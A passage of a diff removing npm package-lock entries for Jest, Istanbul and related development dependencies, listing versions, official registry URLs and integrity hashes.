"https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", - "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", - "dev": true, - "hasInstallScript": true, - "optional": true, - "os": [ - "darwin" - ], - "engines": { - "node": "^8.16.0 || ^10.6.0 || >=11.0.0" - } - }, - "node_modules/function-bind": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.1.tgz", - "integrity": "sha512-yIovAzMX49sF8Yl58fSCWJ5svSLuaibPxXQJFLmBObTuCr0Mf1KiPopGM9NiFjiYBCbfaa2Fh6breQ6ANVTI0A==", - "dev": true - }, - "node_modules/gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true, - "engines": { - "node": "6.* || 8.* || >= 10.*" - } - }, - "node_modules/get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true, - "engines": { - "node": ">=8.0.0" - } - }, - "node_modules/get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "dev": true, - "dependencies": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - }, - "engines": { - "node": "*" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/graceful-fs": { - "version": "4.2.10", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.10.tgz", - "integrity": "sha512-9ByhssR2fPVsNZj478qUUbKfmL0+t5BDVyjShtyZZLiK7ZDAArFFfopyOTj0M05wE2tJPisA4iTnnXl2YoPvOA==", - "dev": true - }, - "node_modules/has": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", - "integrity": "sha512-f2dvO0VU6Oej7RkWJGrehjbzMAjFp5/VKPp5tTpWIV4JHHZK1/BxbFRtf/siA2SWTe09caDmVtYYzWEIbBS4zw==", - "dev": true, - "dependencies": { - "function-bind": "^1.1.1" - }, - "engines": { - "node": ">= 0.4.0" - } - }, - "node_modules/has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "node_modules/human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true, - "engines": { - "node": ">=10.17.0" - } - }, - "node_modules/import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", - "dev": true, - "dependencies": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - }, - "bin": { - "import-local-fixture": "fixtures/cli.js" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true, - "engines": { - "node": ">=0.8.19" - } - }, - "node_modules/inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "dev": true, - "dependencies": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "node_modules/inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "node_modules/is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "node_modules/is-core-module": { - "version": "2.11.0", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.11.0.tgz", - "integrity": "sha512-RRjxlvLDkD1YJwDbroBHMb+cukurkDWNyHx7D3oNB5x9rb5ogcksMC5wHCadcXoo67gVr/+3GFySh3134zi6rw==", - "dev": true, - "dependencies": { - "has": "^1.0.3" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true, - "engines": { - "node": ">=0.12.0" - } - }, - "node_modules/is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", - "dev": true - }, - "node_modules/istanbul-lib-coverage": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-wcdi+uAKzfiGT2abPpKZ0hSU1rGQjUQnLvtY5MpQ7QCTahD3VODhcu4wcfY1YtkGaDD5yuydOLINXsfbus9ROw==", - "dev": true, - "dependencies": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^3.0.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "dependencies": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-reports": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.5.tgz", - "integrity": "sha512-nUsEMa9pBt/NOHqbcbeJEgqIlY/K7rVWUX6Lql2orY5e9roQOthbR3vtY4zzf2orPELg80fnxxk9zUyPlgwD1w==", - "dev": true, - "dependencies": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/jest": { - "version": "29.3.1", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.3.1.tgz", - "integrity": "sha512-6iWfL5DTT0Np6UYs/y5Niu7WIfNv/wRTtN5RSXt2DIEft3dx3zPuw/3WJQBCJfmEzvDiEKwoqMbGD9n49+qLSA==", - "dev": true, - "dependencies": { - "@jest/core": "^29.3.1", - "@jest/types": "^29.3.1", - "import-local": "^3.0.2", - "jest-cli": "^29.3.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-changed-files": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.4.0.tgz", - "integrity": "sha512-rnI1oPxgFghoz32Y8eZsGJMjW54UlqT17ycQeCEktcxxwqqKdlj9afl8LNeO0Pbu+h2JQHThQP0BzS67eTRx4w==", - "dev": true, - "dependencies": { - "execa": "^5.0.0", - "p-limit": "^3.1.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-circus": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.4.1.tgz", - "integrity": "sha512-v02NuL5crMNY4CGPHBEflLzl4v91NFb85a+dH9a1pUNx6Xjggrd8l9pPy4LZ1VYNRXlb+f65+7O/MSIbLir6pA==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.4.1", - "@jest/expect": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^0.7.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.4.1", - "jest-matcher-utils": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-runtime": "^29.4.1", - "jest-snapshot": "^29.4.1", - "jest-util": "^29.4.1", - "p-limit": "^3.1.0", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-cli": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.4.1.tgz", - "integrity": "sha512-jz7GDIhtxQ37M+9dlbv5K+/FVcIo1O/b1sX3cJgzlQUf/3VG25nvuWzlDC4F1FLLzUThJeWLu8I7JF9eWpuURQ==", - "dev": true, - "dependencies": { - "@jest/core": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/types": "^29.4.1", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "import-local": "^3.0.2", - "jest-config": "^29.4.1", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "prompts": "^2.0.1", - "yargs": "^17.3.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-config": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.4.1.tgz", - "integrity": "sha512-g7p3q4NuXiM4hrS4XFATTkd+2z0Ml2RhFmFPM8c3WyKwVDNszbl4E7cV7WIx1YZeqqCtqbtTtZhGZWJlJqngzg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.4.1", - "@jest/types": "^29.4.1", - "babel-jest": "^29.4.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.4.1", - "jest-environment-node": "^29.4.1", - "jest-get-type": "^29.2.0", - "jest-regex-util": "^29.2.0", - "jest-resolve": "^29.4.1", - "jest-runner": "^29.4.1", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@types/node": "*", - "ts-node": ">=9.0.0" - }, - "peerDependenciesMeta": { - "@types/node": { - "optional": true - }, - "ts-node": { - "optional": true - } - } - }, - "node_modules/jest-diff": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.4.1.tgz", - "integrity": "sha512-uazdl2g331iY56CEyfbNA0Ut7Mn2ulAG5vUaEHXycf1L6IPyuImIxSz4F0VYBKi7LYIuxOwTZzK3wh5jHzASMw==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "diff-sequences": "^29.3.1", - "jest-get-type": "^29.2.0", - "pretty-format": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-docblock": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.2.0.tgz", - "integrity": "sha512-bkxUsxTgWQGbXV5IENmfiIuqZhJcyvF7tU4zJ/7ioTutdz4ToB5Yx6JOFBpgI+TphRY4lhOyCWGNH/QFQh5T6A==", - "dev": true, - "dependencies": { - "detect-newline": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-each": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.4.1.tgz", - "integrity": "sha512-QlYFiX3llJMWUV0BtWht/esGEz9w+0i7BHwODKCze7YzZzizgExB9MOfiivF/vVT0GSQ8wXLhvHXh3x2fVD4QQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "chalk": "^4.0.0", - "jest-get-type": "^29.2.0", - "jest-util": "^29.4.1", - "pretty-format": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-environment-node": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.4.1.tgz", - "integrity": "sha512-x/H2kdVgxSkxWAIlIh9MfMuBa0hZySmfsC5lCsWmWr6tZySP44ediRKDUiNggX/eHLH7Cd5ZN10Rw+XF5tXsqg==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.4.1", - "@jest/fake-timers": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "jest-mock": "^29.4.1", - "jest-util": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-leak-detector": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.4.1.tgz", - "integrity": "sha512-akpZv7TPyGMnH2RimOCgy+hPmWZf55EyFUvymQ4LMsQP8xSPlZumCPtXGoDhFNhUE2039RApZkTQDKU79p/FiQ==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.2.0", - "pretty-format": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-matcher-utils": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.4.1.tgz", - "integrity": "sha512-k5h0u8V4nAEy6lSACepxL/rw78FLDkBnXhZVgFneVpnJONhb2DhZj/Gv4eNe+1XqQ5IhgUcqj745UwH0HJmMnA==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "jest-diff": "^29.4.1", - "jest-get-type": "^29.2.0", - "pretty-format": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-message-util": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.4.1.tgz", - "integrity": "sha512-H4/I0cXUaLeCw6FM+i4AwCnOwHRgitdaUFOdm49022YD5nfyr8C/DrbXOBEyJaj+w/y0gGJ57klssOaUiLLQGQ==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.4.1", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-mock": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.4.1.tgz", - "integrity": "sha512-MwA4hQ7zBOcgVCVnsM8TzaFLVUD/pFWTfbkY953Y81L5ret3GFRZtmPmRFAjKQSdCKoJvvqOu6Bvfpqlwwb0dQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "@types/node": "*", - "jest-util": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "engines": { - "node": ">=6" - }, - "peerDependencies": { - "jest-resolve": "*" - }, - "peerDependenciesMeta": { - "jest-resolve": { - "optional": true - } - } - }, - "node_modules/jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.4.1.tgz", - "integrity": "sha512-j/ZFNV2lm9IJ2wmlq1uYK0Y/1PiyDq9g4HEGsNTNr3viRbJdV+8Lf1SXIiLZXFvyiisu0qUyIXGBnw+OKWkJwQ==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve-dependencies": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.4.1.tgz", - "integrity": "sha512-Y3QG3M1ncAMxfjbYgtqNXC5B595zmB6e//p/qpA/58JkQXu/IpLDoLeOa8YoYfsSglBKQQzNUqtfGJJT/qLmJg==", - "dev": true, - "dependencies": { - "jest-regex-util": "^29.2.0", - "jest-snapshot": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.4.1.tgz", - "integrity": "sha512-8d6XXXi7GtHmsHrnaqBKWxjKb166Eyj/ksSaUYdcBK09VbjPwIgWov1VwSmtupCIz8q1Xv4Qkzt/BTo3ZqiCeg==", - "dev": true, - "dependencies": { - "@jest/console": "^29.4.1", - "@jest/environment": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.2.0", - "jest-environment-node": "^29.4.1", - "jest-haste-map": "^29.4.1", - "jest-leak-detector": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-resolve": "^29.4.1", - "jest-runtime": "^29.4.1", - "jest-util": "^29.4.1", - "jest-watcher": "^29.4.1", - "jest-worker": "^29.4.1", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runtime": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.4.1.tgz", - "integrity": "sha512-UXTMU9uKu2GjYwTtoAw5rn4STxWw/nadOfW7v1sx6LaJYa3V/iymdCLQM6xy3+7C6mY8GfX22vKpgxY171UIoA==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.4.1", - "@jest/fake-timers": "^29.4.1", - "@jest/globals": "^29.4.1", - "@jest/source-map": "^29.2.0", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-mock": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-resolve": "^29.4.1", - "jest-snapshot": "^29.4.1", - "jest-util": "^29.4.1", - "semver": "^7.3.5", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runtime/node_modules/lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-runtime/node_modules/semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "dependencies": { - "lru-cache": "^6.0.0" - }, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-runtime/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - }, - "node_modules/jest-snapshot": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.4.1.tgz", - "integrity": "sha512-l4iV8EjGgQWVz3ee/LR9sULDk2pCkqb71bjvlqn+qp90lFwpnulHj4ZBT8nm1hA1C5wowXLc7MGnw321u0tsYA==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/traverse": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/babel__traverse": "^7.0.6", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.4.1", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.4.1", - "jest-get-type": "^29.2.0", - "jest-haste-map": "^29.4.1", - "jest-matcher-utils": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1", - "natural-compare": "^1.4.0", - "pretty-format": "^29.4.1", - "semver": "^7.3.5" - }, - "engines": { - "node": 